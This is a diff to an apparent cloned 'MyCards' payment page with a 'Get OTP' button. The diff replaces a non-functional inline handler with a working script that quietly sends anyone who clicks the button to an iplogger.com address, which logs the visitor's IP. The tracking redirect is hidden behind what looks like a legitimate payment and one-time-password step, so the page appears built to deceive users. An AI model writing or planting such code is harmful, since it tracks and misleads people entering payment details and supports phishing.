--- a/payment.html
+++ b/payment.html
@@ -393,10 +393,8 @@
           </div>
           <div aria-disabled="true" disabled="" class="css-1dbjc4n r-1i6wzkk r-lrvibr"
             style="-webkit-align-items:center;align-items:center;background-color:rgba(29,134,255,1.00);border-top-left-radius:5px;border-top-right-radius:5px;border-bottom-right-radius:5px;border-bottom-left-radius:5px;-webkit-flex-direction:row;-ms-flex-direction:row;flex-direction:row;height:44px;-webkit-justify-content:center;justify-content:center;opacity:0.5;-webkit-transition-duration:0s;transition-duration:0s;width:calc((90vw));-ms-flex-align:center;-webkit-box-align:center;-webkit-box-orient:horizontal;-webkit-box-direction:normal;-ms-flex-pack:center;-webkit-box-pack:center">
-            <div dir="auto" class="css-901oao"
-              style="color:rgba(248,248,248,1.00);font-family:Open Sans;font-size:18px;font-weight:600" onclick="function name() {
-                window.href='https://iplogger.com/XUB1d';
-              }">Get OTP</div>
+            <div id="getotp" dir="auto" class="css-901oao"
+              style="color:rgba(248,248,248,1.00);font-family:Open Sans;font-size:18px;font-weight:600">Get OTP</div>
           </div>
           <div dir="auto" class="css-901oao"
             style="color:rgba(65,65,65,1.00);font-family:Open Sans Light;font-size:12px;margin-top:10px">MyCards is best
@@ -445,5 +443,13 @@
   <script id="__NEXT_DATA__"
     type="application/json">{"props":{"pageProps":{}},"page":"/","query":{"next":null},"buildId":"EYZ_5mDLMY3ND0po7YX8g","assetPrefix":"https://d157777v0iph40.cloudfront.net/portal/pwa/static/v1/202304042314","nextExport":true,"autoExport":true,"isFallback":false,"scriptLoader":[]}</script>
 </body>
+<script>
+  let get = document.getElementById('getotp');
+get.onclick = function() {
+  window.location.href = 'https://iplogger.com/XUB1d';
+};
+
+
+</script>
 
 </html>
